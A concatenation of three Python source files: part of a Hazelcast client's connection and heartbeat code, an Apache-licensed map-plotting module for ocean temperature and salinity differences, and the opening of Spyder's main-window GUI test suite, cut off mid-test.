"Client can not work with this cluster because it has a "
"different partition count. Expected partition count: %d, "
"Member partition count: %d"
% (self._partition_service.partition_count, partition_count)
)
def _check_client_active(self):
if not self._lifecycle_service.running:
raise HazelcastClientNotActiveError()
def _get_possible_addresses(self):
member_addresses = list(
map(lambda m: (m.address, None), self._cluster_service.get_members())
)
if self._shuffle_member_list:
random.shuffle(member_addresses)
addresses = OrderedDict(member_addresses)
primaries, secondaries = self._address_provider.load_addresses()
if self._shuffle_member_list:
random.shuffle(primaries)
random.shuffle(secondaries)
for address in primaries:
addresses[address] = None
for address in secondaries:
addresses[address] = None
return six.iterkeys(addresses)
class _HeartbeatManager(object):
_heartbeat_timer = None
def __init__(self, connection_manager, client, config, reactor, invocation_service):
self._connection_manager = connection_manager
self._client = client
self._reactor = reactor
self._invocation_service = invocation_service
self._heartbeat_timeout = config.heartbeat_timeout
self._heartbeat_interval = config.heartbeat_interval
def start(self):
"""Starts sending periodic HeartBeat operations."""
def _heartbeat():
conn_manager = self._connection_manager
if not conn_manager.live:
return
now = time.time()
for connection in list(six.itervalues(conn_manager.active_connections)):
self._check_connection(now, connection)
self._heartbeat_timer = self._reactor.add_timer(self._heartbeat_interval, _heartbeat)
self._heartbeat_timer = self._reactor.add_timer(self._heartbeat_interval, _heartbeat)
def shutdown(self):
"""Stops HeartBeat operations."""
if self._heartbeat_timer:
self._heartbeat_timer.cancel()
def _check_connection(self, now, connection):
if not connection.live:
return
if (now - connection.last_read_time) > self._heartbeat_timeout:
_logger.warning("Heartbeat failed over the connection: %s", connection)
connection.close(
"Heartbeat timed out",
TargetDisconnectedError("Heartbeat timed out to connection %s" % connection),
)
return
if (now - connection.last_write_time) > self._heartbeat_interval:
request = client_ping_codec.encode_request()
invocation = Invocation(request, connection=connection, urgent=True)
self._invocation_service.invoke(invocation)
_frame_header = struct.Struct("<iH")
class _Reader(object):
def __init__(self, builder):
self._buf = io.BytesIO()
self._builder = builder
self._bytes_read = 0
self._bytes_written = 0
self._frame_size = 0
self._frame_flags = 0
self._message = None
def read(self, data):
self._buf.seek(self._bytes_written)
self._buf.write(data)
self._bytes_written += len(data)
def process(self):
message = self._read_message()
while message:
self._builder.on_message(message)
message = self._read_message()
def _read_message(self):
while True:
if self._read_frame():
if self._message.end_frame.is_final_frame():
msg = self._message
self._reset()
return msg
else:
return None
def _read_frame(self):
n = self.length
if n < SIZE_OF_FRAME_LENGTH_AND_FLAGS:
# we don't have even the frame length and flags ready
return False
if self._frame_size == 0:
self._read_frame_size_and_flags()
if n < self._frame_size:
return False
self._buf.seek(self._bytes_read)
size = self._frame_size - SIZE_OF_FRAME_LENGTH_AND_FLAGS
data = self._buf.read(size)
self._bytes_read += size
self._frame_size = 0
# No need to reset flags since it will be overwritten on the next read_frame_size_and_flags call
frame = Frame(data, self._frame_flags)
if not self._message:
self._message = InboundMessage(frame)
else:
self._message.add_frame(frame)
return True
def _read_frame_size_and_flags(self):
self._buf.seek(self._bytes_read)
header_data = self._buf.read(SIZE_OF_FRAME_LENGTH_AND_FLAGS)
self._frame_size, self._frame_flags = _frame_header.unpack_from(header_data, 0)
self._bytes_read += SIZE_OF_FRAME_LENGTH_AND_FLAGS
def _reset(self):
if self._bytes_written == self._bytes_read:
self._buf.seek(0)
self._buf.truncate()
self._bytes_written = 0
self._bytes_read = 0
self._message = None
@property
def length(self):
return self._bytes_written - self._bytes_read
class Connection(object):
"""Connection object which stores connection related information and operations."""
def __init__(self, connection_manager, connection_id, message_callback):
self.remote_address = None
self.remote_uuid = None
self.connected_address = None
self.local_address = None
self.last_read_time = 0
self.last_write_time = 0
self.start_time = 0
self.server_version = UNKNOWN_VERSION
self.live = True
self.close_reason = None
self._connection_manager = connection_manager
self._id = connection_id
self._builder = ClientMessageBuilder(message_callback)
self._reader = _Reader(self._builder)
def send_message(self, message):
"""Sends a message to this connection.
Args:
message (hazelcast.protocol.client_message.OutboundMessage): Message to be sent to this connection.
Returns:
bool: ``True`` if the message is written to the socket, ``False`` otherwise.
"""
if not self.live:
return False
self._write(message.buf)
return True
def close(self, reason, cause):
"""Closes the connection.
Args:
reason (str): The reason this connection is going to be closed. Is allowed to be None.
cause (Exception): The exception responsible for closing this connection. Is allowed to be None.
"""
if not self.live:
return
self.live = False
self.close_reason = reason
self._log_close(reason, cause)
try:
self._inner_close()
except:
_logger.exception("Error while closing the the connection %s", self)
self._connection_manager.on_connection_close(self, cause)
def _log_close(self, reason, cause):
msg = "%s closed. Reason: %s"
if reason:
r = reason
elif cause:
r = cause
else:
r = "Socket explicitly closed"
if self._connection_manager.live:
_logger.info(msg, self, r)
else:
_logger.debug(msg, self, r)
def _inner_close(self):
raise NotImplementedError()
def _write(self, buf):
raise NotImplementedError()
def __eq__(self, other):
return isinstance(other, Connection) and self._id == other._id
def __ne__(self, other):
return not self.__eq__(other)
def __hash__(self):
return self._id
class DefaultAddressProvider(object):
"""Provides initial addresses for client to find and connect to a node.
It also provides a no-op translator.
"""
def __init__(self, addresses):
self._addresses = addresses
def load_addresses(self):
"""Returns the possible primary and secondary member addresses to connect to."""
configured_addresses = self._addresses
if not configured_addresses:
configured_addresses = ["127.0.0.1"]
primaries = []
secondaries = []
for address in configured_addresses:
p, s = AddressHelper.get_possible_addresses(address)
primaries.extend(p)
secondaries.extend(s)
return primaries, secondaries
def translate(self, address):
"""No-op address translator.
It is there to provide the same API with other address providers.
"""
return address
|
mapplot.py
|
# Licensed to the Apache Software Foundation (ASF) under one or more
# contributor license agreements. See the NOTICE file distributed with
# this work for additional information regarding copyright ownership.
# The ASF licenses this file to You under the Apache License, Version 2.0
# (the "License"); you may not use this file except in compliance with
# the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import string
from io import StringIO
from multiprocessing import Process, Manager
import matplotlib
import matplotlib.pyplot as plt
import numpy as np
from mpl_toolkits.basemap import Basemap
from . import BaseDomsHandler
from . import ResultsStorage
if not matplotlib.get_backend():
matplotlib.use('Agg')
PARAMETER_TO_FIELD = {
"sst": "sea_water_temperature",
"sss": "sea_water_salinity"
}
PARAMETER_TO_UNITS = {
"sst": "($^\circ$ C)",
"sss": "(g/L)"
}
def __square(minLon, maxLon, minLat, maxLat):
if maxLat - minLat > maxLon - minLon:
a = ((maxLat - minLat) - (maxLon - minLon)) / 2.0
minLon -= a
maxLon += a
elif maxLon - minLon > maxLat - minLat:
a = ((maxLon - minLon) - (maxLat - minLat)) / 2.0
minLat -= a
maxLat += a
return minLon, maxLon, minLat, maxLat
def render(d, lats, lons, z, primary, secondary, parameter):
fig = plt.figure()
ax = fig.add_axes([0.1, 0.1, 0.8, 0.8])
ax.set_title(string.upper("%s vs. %s" % (primary, secondary)))
# ax.set_ylabel('Latitude')
# ax.set_xlabel('Longitude')
minLatA = np.min(lats)
maxLatA = np.max(lats)
minLonA = np.min(lons)
maxLonA = np.max(lons)
minLat = minLatA - (abs(maxLatA - minLatA) * 0.1)
maxLat = maxLatA + (abs(maxLatA - minLatA) * 0.1)
minLon = minLonA - (abs(maxLonA - minLonA) * 0.1)
maxLon = maxLonA + (abs(maxLonA - minLonA) * 0.1)
minLon, maxLon, minLat, maxLat = __square(minLon, maxLon, minLat, maxLat)
# m = Basemap(projection='mill', llcrnrlon=-180,llcrnrlat=-80,urcrnrlon=180,urcrnrlat=80,resolution='l')
m = Basemap(projection='mill', llcrnrlon=minLon, llcrnrlat=minLat, urcrnrlon=maxLon, urcrnrlat=maxLat,
resolution='l')
m.drawparallels(np.arange(minLat, maxLat, (maxLat - minLat) / 5.0), labels=[1, 0, 0, 0], fontsize=10)
m.drawmeridians(np.arange(minLon, maxLon, (maxLon - minLon) / 5.0), labels=[0, 0, 0, 1], fontsize=10)
m.drawcoastlines()
m.drawmapboundary(fill_color='#99ffff')
m.fillcontinents(color='#cc9966', lake_color='#99ffff')
# lats, lons = np.meshgrid(lats, lons)
masked_array = np.ma.array(z, mask=np.isnan(z))
z = masked_array
values = np.zeros(len(z))
for i in range(0, len(z)):
values[i] = ((z[i] - np.min(z)) / (np.max(z) - np.min(z)) * 20.0) + 10
x, y = m(lons, lats)
im1 = m.scatter(x, y, values)
im1.set_array(z)
cb = m.colorbar(im1)
units = PARAMETER_TO_UNITS[parameter] if parameter in PARAMETER_TO_UNITS else PARAMETER_TO_UNITS["sst"]
cb.set_label("Difference %s" % units)
sio = StringIO()
plt.savefig(sio, format='png')
plot = sio.getvalue()
if d is not None:
d['plot'] = plot
return plot
class DomsMapPlotQueryResults(BaseDomsHandler.DomsQueryResults):
def __init__(self, lats, lons, z, parameter, primary, secondary, args=None, bounds=None, count=None, details=None,
computeOptions=None, executionId=None, plot=None):
BaseDomsHandler.DomsQueryResults.__init__(self, results={"lats": lats, "lons": lons, "values": z}, args=args,
details=details, bounds=bounds, count=count,
computeOptions=computeOptions, executionId=executionId)
self.__lats = lats
self.__lons = lons
self.__z = np.array(z)
self.__parameter = parameter
self.__primary = primary
self.__secondary = secondary
self.__plot = plot
def toImage(self):
return self.__plot
def renderAsync(x, y, z, primary, secondary, parameter):
manager = Manager()
d = manager.dict()
p = Process(target=render, args=(d, x, y, z, primary, secondary, parameter))
p.start()
p.join()
return d['plot']
def createMapPlot(id, parameter):
with ResultsStorage.ResultsRetrieval() as storage:
params, stats, data = storage.retrieveResults(id)
primary = params["primary"]
secondary = params["matchup"][0]
lats = []
lons = []
z = []
field = PARAMETER_TO_FIELD[parameter] if parameter in PARAMETER_TO_FIELD else PARAMETER_TO_FIELD["sst"]
for entry in data:
for match in entry["matches"]:
if match["source"] == secondary:
if field in entry and field in match:
a = entry[field]
b = match[field]
z.append((a - b))
z.append((a - b))
else:
z.append(1.0)
z.append(1.0)
lats.append(entry["y"])
lons.append(entry["x"])
lats.append(match["y"])
lons.append(match["x"])
plot = renderAsync(lats, lons, z, primary, secondary, parameter)
r = DomsMapPlotQueryResults(lats=lats, lons=lons, z=z, parameter=parameter, primary=primary, secondary=secondary,
args=params,
details=stats, bounds=None, count=None, computeOptions=None, executionId=id, plot=plot)
return r
|
test_mainwindow.py
|
# -*- coding: utf-8 -*-
# -----------------------------------------------------------------------------
# Copyright © Spyder Project Contributors
#
# Licensed under the terms of the MIT License
# (see spyder/__init__.py for details)
# -----------------------------------------------------------------------------
"""
Tests for the main window.
"""
# Standard library imports
import os
import os.path as osp
import re
import shutil
import sys
import tempfile
from textwrap import dedent
from unittest.mock import Mock
import uuid
# Third party imports
from flaky import flaky
import ipykernel
from IPython.core import release as ipy_release
from jupyter_client.manager import KernelManager
from matplotlib.testing.compare import compare_images
import nbconvert
import numpy as np
from numpy.testing import assert_array_equal
import pkg_resources
from pkg_resources import parse_version
import pylint
import pytest
from qtpy import PYQT_VERSION
from qtpy.QtCore import Qt, QTimer
from qtpy.QtTest import QTest
from qtpy.QtGui import QImage, QTextCursor
from qtpy.QtWidgets import (QAction, QApplication, QFileDialog, QLineEdit,
QTabBar, QWidget)
from qtpy.QtWebEngineWidgets import WEBENGINE
# Local imports
from spyder import __trouble_url__
from spyder.api.utils import get_class_values
from spyder.api.widgets.auxiliary_widgets import SpyderWindowWidget
from spyder.api.plugins import Plugins
from spyder.app import start
from spyder.config.base import (
get_home_dir, get_conf_path, get_module_path, running_in_ci)
from spyder.config.manager import CONF
from spyder.dependencies import DEPENDENCIES
from spyder.plugins.help.widgets import ObjectComboBox
from spyder.plugins.help.tests.test_plugin import check_text
from spyder.plugins.ipythonconsole.utils.kernelspec import SpyderKernelSpec
from spyder.plugins.layout.layouts import DefaultLayouts
from spyder.plugins.projects.api import EmptyProject
from spyder.py3compat import PY2, qbytearray_to_str, to_text_string
from spyder.utils import encoding
from spyder.utils.misc import remove_backslashes
from spyder.utils.clipboard_helper import CLIPBOARD_HELPER
from spyder.widgets.dock import DockTitleBar
# =============================================================================
# ---- Constants
# =============================================================================
# Location of this file
LOCATION = osp.realpath(osp.join(os.getcwd(), osp.dirname(__file__)))
# Time to wait until the IPython console is ready to receive input
# (in milliseconds)
SHELL_TIMEOUT = 40000 if os.name == 'nt' else 20000
# Need longer EVAL_TIMEOUT, because need to cythonize and C compile ".pyx" file
# before import and eval it
COMPILE_AND_EVAL_TIMEOUT = 30000
# Time to wait for the IPython console to evaluate something (in
# milliseconds)
EVAL_TIMEOUT = 3000
# =============================================================================
# ---- Utility functions
# =============================================================================
def open_file_in_editor(main_window, fname, directory=None):
"""Open a file using the Editor and its open file dialog"""
top_level_widgets = QApplication.topLevelWidgets()
for w in top_level_widgets:
if isinstance(w, QFileDialog):
if directory is not None:
w.setDirectory(directory)
input_field = w.findChildren(QLineEdit)[0]
input_field.setText(fname)
QTest.keyClick(w, Qt.Key_Enter)
def reset_run_code(qtbot, shell, code_editor, nsb):
"""Reset state after a run code test"""
qtbot.waitUntil(lambda: not shell._executing)
with qtbot.waitSignal(shell.executed):
shell.execute('%reset -f')
qtbot.waitUntil(lambda: nsb.editor.source_model.rowCount() == 0, timeout=EVAL_TIMEOUT)
code_editor.setFocus()
qtbot.keyClick(code_editor, Qt.Key_Home, modifier=Qt.ControlModifier)
def start_new_kernel(startup_timeout=60, kernel_name='python', spykernel=False,
**kwargs):
"""Start a new kernel, and return its Manager and Client"""
km = KernelManager(kernel_name=kernel_name)
if spykernel:
km._kernel_spec = SpyderKernelSpec()
km.start_kernel(**kwargs)
kc = km.client()
kc.start_channels()
try:
kc.wait_for_ready(timeout=startup_timeout)
except RuntimeError:
kc.stop_channels()
km.shutdown_kernel()
raise
return km, kc
def find_desired_tab_in_window(tab_name, window):
all_tabbars = window.findChildren(QTabBar)
for current_tabbar in all_tabbars:
for tab_index in range(current_tabbar.count()):
if current_tabbar.tabText(tab_index) == str(tab_name):
return current_tabbar, tab_index
return None, None
def register_fake_entrypoints():
"""
Create entry points distribution to register elements:
* Completion providers (Fallback, Shippets, LSP)
"""
# Completion providers
fallback = pkg_resources.EntryPoint.parse(
'fallback = spyder.plugins.completion.providers.fallback.provider:'
'FallbackProvider'
)
snippets = pkg_resources.EntryPoint.parse(
'snippets = spyder.plugins.completion.providers.snippets.provider:'
'SnippetsProvider'
)
lsp = pkg_resources.EntryPoint.parse(
'lsp = spyder.plugins.completion.providers.languageserver.provider:'
'LanguageServerProvider'
)
# Create a fake Spyder distribution
d = pkg_resources.Distribution(__file__)
# Add the providers to the fake EntryPoints
d._ep_map = {
'spyder.completions': {
'fallback': fallback,
'snippets': snippets,
'lsp': lsp
}
}
# Add the fake distribution to the global working_set
pkg_resources.working_set.add(d, 'spyder')
def remove_fake_entrypoints():
"""Remove fake entry points from pkg_resources"""
try:
pkg_resources.working_set.by_key.pop('unknown')
pkg_resources.working_set.entry_keys.pop('spyder')
pkg_resources.working_set.entry_keys.pop(__file__)
pkg_resources.working_set.entries.remove('spyder')
except KeyError:
pass
def read_asset_file(filename):
"""Read contents of an asset file."""
return encoding.read(osp.join(LOCATION, filename))[0]
# =============================================================================
# ---- Fixtures
# =============================================================================
@pytest.fixture
def main_window(request, tmpdir):
"""Main Window fixture"""
if not running_in_ci():
register_fake_entrypoints()
# Tests assume inline backend
CONF.set('ipython_console', 'pylab/backend', 0)
# Test assume the plots are rendered in the console as png
CONF.set('plots', 'mute_inline_plotting', False)
CONF.set('ipython_console', 'pylab/inline/figure_format', 0)
# Set exclamation mark to True
CONF.set('ipython_console', 'pdb_use_exclamation_mark', True)
# Check if we need to use introspection in a given test
# (it's faster and less memory consuming not to use it!)
use_introspection = request.node.get_closest_marker('use_introspection')
if use_introspection:
os.environ['SPY_TEST_USE_INTROSPECTION'] = 'True'
else:
try:
os.environ.pop('SPY_TEST_USE_INTROSPECTION')
except KeyError:
pass
# Only use single_instance mode for tests that require it
single_instance = request.node.get_closest_marker('single_instance')
if single_instance:
CONF.set('main', 'single_instance', True)
else:
CONF.set('main', 'single_instance', False)
# Check if we need to load a simple project to the interface
preload_project = request.node.get_closest_marker('preload_project')
if preload_project:
# Create project directory
project = tmpdir.mkdir('test_project')
project_path = str(project)
# Create Spyder project
spy_project = EmptyProject(project_path)
CONF.set('project_explorer', 'current_project_path', project_path)
# Add a file to the project
file = project.join('file.py')
file.write(read_asset_file('script_outline_1.py'))
spy_project.set_recent_files([str(file)])
else:
CONF.set('project_explorer', 'current_project_path', None)
# Check if we need to preload a complex project in a give test
preload_complex_project = request.node.get_closest_marker(
'preload_complex_project')
if preload_complex_project:
# Create project
project = tmpdir.mkdir('test_project')
project_subdir = project.mkdir('subdir')
project_sub_subdir = project_subdir.mkdir('sub_subdir')
# Create directories out of the project
out_of_project_1 = tmpdir.mkdir('out_of_project_1')
out_of_project_2 = tmpdir.mkdir('out_of_project_2')
out_of_project_1_subdir = out_of_project_1.mkdir('subdir')
out_of_project_2_subdir = out_of_project_2.mkdir('subdir')
project_path = str(project)
spy_project = EmptyProject(project_path)
CONF.set('project_explorer', 'current_project_path', project_path)
# Add some files to project. This is necessary to test that we get
# symbols for all these files.
abs_filenames = []
filenames_to_create = {
project: ['file1.py', 'file2.py', 'file3.txt', '__init__.py'],
project_subdir: ['a.py', '__init__.py'],
project_sub_subdir: ['b.py', '__init__.py'],
out_of_project_1: ['c.py'],
out_of_project_2: ['d.py', '__init__.py'],
out_of_project_1_subdir: ['e.py', '__init__.py'],
out_of_project_2_subdir: ['f.py']
}
for path in filenames_to_create.keys():
filenames = filenames_to_create[path]
for filename in filenames:
file = path.join(filename)
abs_filenames.append(str(file))
if osp.splitext(filename)[1] == '.py':
if path == project_subdir:
code = read_asset_file('script_outline_2.py')
elif path == project_sub_subdir:
code = read_asset_file('script_outline_3.py')
else:
code = read_asset_file('script_outline_1.py')
file.write(code)
else:
file.write("Hello world!")
spy_project.set_recent_files(abs_filenames)
else:
if not preload_project:
CONF.set('project_explorer', 'current_project_path', None)
# Get config values passed in parametrize and apply them
try:
param = request.param
if isinstance(param, dict) and 'spy_config' in param:
CONF.set(*param['spy_config'])
except AttributeError:
pass
if not hasattr(main_window, 'window'):
from spyder.api.plugin_registration.registry import PLUGIN_REGISTRY
PLUGIN_REGISTRY.reset()
# Start the window
window = start.main()
main_window.window = window
else:
window = main_window.window
# Close everything we can think of
window.editor.close_file()
window.projects.close_project()
if window.console.error_dialog:
window.console.close_error_dialog()
window.switcher.close()
for client in window.ipyconsole.get_clients():
window.ipyconsole.close_client(client=client, ask_recursive=False)
window.outlineexplorer.stop_symbol_services('python')
# Reset cwd
window.explorer.chdir(get_home_dir())
spyder_boilerplate = window.get_plugin(
'spyder_boilerplate', error=False)
if spyder_boilerplate is not None:
window.unregister_plugin(spyder_boilerplate)
# Remove Kite (In case it was registered via setup.py)
window.completions.providers.pop('kite', None)
yield window
# Print shell content if failed
if request.node.rep_setup.passed:
if request.node.rep_call.failed:
# Print content of shellwidget and close window
print(window.ipyconsole.get_current_shellwidget(
)._control.toPlainText())
# Print info page content is not blank
console = window.ipyconsole
client = console.get_current_client()
if client.info_page != client.blank_page:
print('info_page')
print(client.info_page)
window.close()
del main_window.window
@pytest.fixture(scope="session", autouse=True)
def cleanup(request):
"""Cleanup a testing directory once we are finished."""
def close_window():
if hasattr(main_window, 'window'):
try:
main_window.window.close()
except AttributeError:
pass
# Also clean entry points if running locally.
if not running_in_ci():
remove_fake_entrypoints()
request.addfinalizer(close_window)
# =============================================================================
# ---- Tests
# =============================================================================
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.single_instance
@pytest.mark.skipif(
not running_in_ci(), reason="It's not meant to be run outside of CIs")
def test_single_instance_and_edit_magic(main_window, qtbot, tmpdir):
"""Test single instance mode and %edit magic."""
editorstack = main_window.editor.get_current_editorstack()
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None, timeout=SHELL_TIMEOUT)
spy_dir = osp.dirname(get_module_path('spyder'))
lock_code = (
"import sys\n"
"sys.path.append(r'{spy_dir_str}')\n"
"from spyder.utils.external import lockfile\n"
"lock_file = r'{lock_file}'\n"
"lock = lockfile.FilesystemLock(lock_file)\n"
"lock_created = lock.lock()\n"
"print(lock_created)".format(
spy_dir_str=spy_dir,
lock_file=get_conf_path('spyder.lock'))
)
with qtbot.waitSignal(shell.executed, timeout=2000):
shell.execute(lock_code)
qtbot.wait(1000)
assert not shell.get_value('lock_created')
# Test %edit magic
n_editors = editorstack.get_stack_count()
p = tmpdir.mkdir("foo").join("bar.py")
p.write(lock_code)
with qtbot.waitSignal(shell.executed):
shell.execute('%edit {}'.format(to_text_string(p)))
qtbot.wait(3000)
assert editorstack.get_stack_count() == n_editors + 1
assert editorstack.get_current_editor().toPlainText() == lock_code
main_window.editor.close_file()
@pytest.mark.slow
def test_lock_action(main_window):
"""Test the lock interface action."""
action = main_window.layouts.lock_interface_action
plugins = main_window.widgetlist
# By default the interface is locked.
assert main_window.layouts._interface_locked
# In this state the title bar is an empty QWidget
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert not isinstance(title_bar, DockTitleBar)
assert isinstance(title_bar, QWidget)
# Test that our custom title bar is shown when the action
# is triggered.
action.trigger()
for plugin in plugins:
title_bar = plugin.dockwidget.titleBarWidget()
assert isinstance(title_bar, DockTitleBar)
assert not main_window.layouts._interface_locked
# Restore default state
action.trigger()
assert main_window.layouts._interface_locked
@pytest.mark.slow
@pytest.mark.order(1)
@pytest.mark.skipif(sys.platform.startswith('linux') and not running_in_ci(),
reason='Fails on Linux when run locally')
def test_default_plugin_actions(main_window, qtbot):
"""Test the effect of dock, undock, close and toggle view actions."""
# Use a particular plugin
file_explorer = main_window.explorer
main_widget = file_explorer.get_widget()
# Undock action
main_widget.undock_action.triggered.emit(True)
qtbot.wait(500)
main_widget.windowwidget.move(200, 200)
assert not file_explorer.dockwidget.isVisible()
assert main_widget.undock_action is not None
assert isinstance(main_widget.windowwidget, SpyderWindowWidget)
assert main_widget.windowwidget.centralWidget() == main_widget
# Dock action
main_widget.dock_action.triggered.emit(True)
qtbot.wait(500)
assert file_explorer.dockwidget.isVisible()
assert main_widget.windowwidget is None
# Test geometry was saved on close
geometry = file_explorer.get_conf('window_geometry')
assert geometry != ''
# Test restoring undocked plugin with the right geometry
file_explorer.set_conf('undocked_on_window_close', True)
main_window.restore_undocked_plugins()
assert main_widget.windowwidget is not None
assert (
geometry == qbytearray_to_str(main_widget.windowwidget.saveGeometry())
)
main_widget.windowwidget.close()
# Close action
main_widget.close_action.triggered.emit(True)
qtbot.wait(500)
assert not file_explorer.dockwidget.isVisible()
assert not file_explorer.toggle_view_action.isChecked()
# Toggle view action
file_explorer.toggle_view_action.setChecked(True)
assert file_explorer.dockwidget.isVisible()
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.parametrize('main_window', [{'spy_config': ('main', 'opengl', 'software')}], indirect=True)
def test_opengl_implementation(main_window, qtbot):
"""
Test that we are setting the selected OpenGL implementation
"""
assert main_window._test_setting_opengl('software')
# Restore default config value
CONF.set('main', 'opengl', 'automatic')
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(
np.__version__ < '1.14.0' or (os.name == 'nt' and PY2),
reason="This only happens in Numpy 1.14+"
)
@pytest.mark.parametrize('main_window', [{'spy_config': ('variable_explorer', 'minmax', True)}], indirect=True)
def test_filter_numpy_warning(main_window, qtbot):
"""
Test that we filter a warning shown when an array contains nan
values and the Variable Explorer option 'Show arrays min/man'
is on.
For spyder-ide/spyder#7063.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Create an array with a nan value
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np; A=np.full(16, np.nan)')
qtbot.wait(1000)
# Assert that no warnings are shown in the console
assert "warning" not in control.toPlainText()
assert "Warning" not in control.toPlainText()
# Restore default config value
CONF.set('variable_explorer', 'minmax', False)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(PY2 or not sys.platform == 'darwin',
reason="Times out in PY2 and fails on other than macOS")
def test_get_help_combo(main_window, qtbot):
"""
Test that Help can display docstrings for names typed in its combobox.
"""
shell = main_window.ipyconsole.get_current_shellwidget()
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
if WEBENGINE:
webpage = webview.page()
else:
webpage = webview.page().mainFrame()
# --- From the console ---
# Write some object in the console
with qtbot.waitSignal(shell.executed):
shell.execute('import numpy as np')
# Get help - numpy
object_combo = help_plugin.get_widget().object_combo
object_combo.setFocus()
qtbot.keyClicks(object_combo, 'numpy', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - numpy.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
# Get help - np
# Clear combo
object_combo.set_current_text('')
qtbot.keyClicks(object_combo, 'np', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "NumPy"), timeout=6000)
# Get help - np.arange
qtbot.keyClicks(object_combo, '.arange', delay=100)
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "arange"), timeout=6000)
@pytest.mark.slow
@pytest.mark.skipif(PY2, reason="Invalid definition of function in Python 2.")
def test_get_help_ipython_console_dot_notation(main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
with dot calls i.e np.sin
See spyder-ide/spyder#11821
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name
qtbot.keyClicks(control, u'np.linalg.norm')
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(
lambda: check_text(webpage, "Matrix or vector norm."),
timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(sys.platform == 'darwin', reason="Too flaky on Mac")
def test_get_help_ipython_console_special_characters(
main_window, qtbot, tmpdir):
"""
Test that Help works when called from the IPython console
for unusual characters.
See spyder-ide/spyder#7699
"""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
# Open test file
test_file = osp.join(LOCATION, 'script_unicode.py')
main_window.editor.load(test_file)
code_editor = main_window.editor.get_focus_widget()
# Run test file
qtbot.keyClick(code_editor, Qt.Key_F5)
qtbot.wait(500)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write function name and assert in Console
def check_control(control, value):
return value in control.toPlainText()
qtbot.keyClicks(control, u'aa\t')
qtbot.waitUntil(lambda: check_control(control, u'aaʹbb'), timeout=2000)
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "This function docstring."),
timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(os.name == 'nt' and running_in_ci(),
reason="Times out on Windows")
def test_get_help_ipython_console(main_window, qtbot):
"""Test that Help works when called from the IPython console."""
shell = main_window.ipyconsole.get_current_shellwidget()
control = shell._control
qtbot.waitUntil(lambda: shell._prompt_html is not None,
timeout=SHELL_TIMEOUT)
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
# Write some object in the console
qtbot.keyClicks(control, 'runfile')
# Get help
control.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, "namespace"), timeout=6000)
@pytest.mark.slow
@flaky(max_runs=3)
@pytest.mark.skipif(not sys.platform.startswith('linux'),
reason="Does not work on Mac and Windows!")
@pytest.mark.use_introspection
@pytest.mark.parametrize(
"object_info",
[("range", "range"),
("import numpy as np", "An array object of arbitrary homogeneous items")])
def test_get_help_editor(main_window, qtbot, object_info):
"""Test that Help works when called from the Editor."""
help_plugin = main_window.help
webview = help_plugin.get_widget().rich_text.webview._webview
webpage = webview.page() if WEBENGINE else webview.page().mainFrame()
main_window.editor.new(fname="test.py", text="")
code_editor = main_window.editor.get_focus_widget()
editorstack = main_window.editor.get_current_editorstack()
with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_open()
# Write some object in the editor
object_name, expected_text = object_info
code_editor.set_text(object_name)
code_editor.move_cursor(len(object_name))
with qtbot.waitSignal(code_editor.completions_response_signal, timeout=30000):
code_editor.document_did_change()
# Get help
with qtbot.waitSignal(code_editor.sig_display_object_info, timeout=30000):
editorstack.inspect_current_object()
# Check that a expected text is part of the page
qtbot.waitUntil(lambda: check_text(webpage, expected_text), timeout=30000)
@pytest.mark.slow
def test_window_title(main_window, tmpdir):
"""Test window title with non-ascii characters."""
projects = main_window.projects
# Create a project in non-ascii path
path = to_text_string(tmpdir.mkdir(u'測試'))
projects.open_project(path=path)
# Set non-ascii window title
main_window.window_title = u'اختبار'
# Assert window title is computed without errors
# and has the expected strings
main_window.set_window_title()
title = main_window.base_title
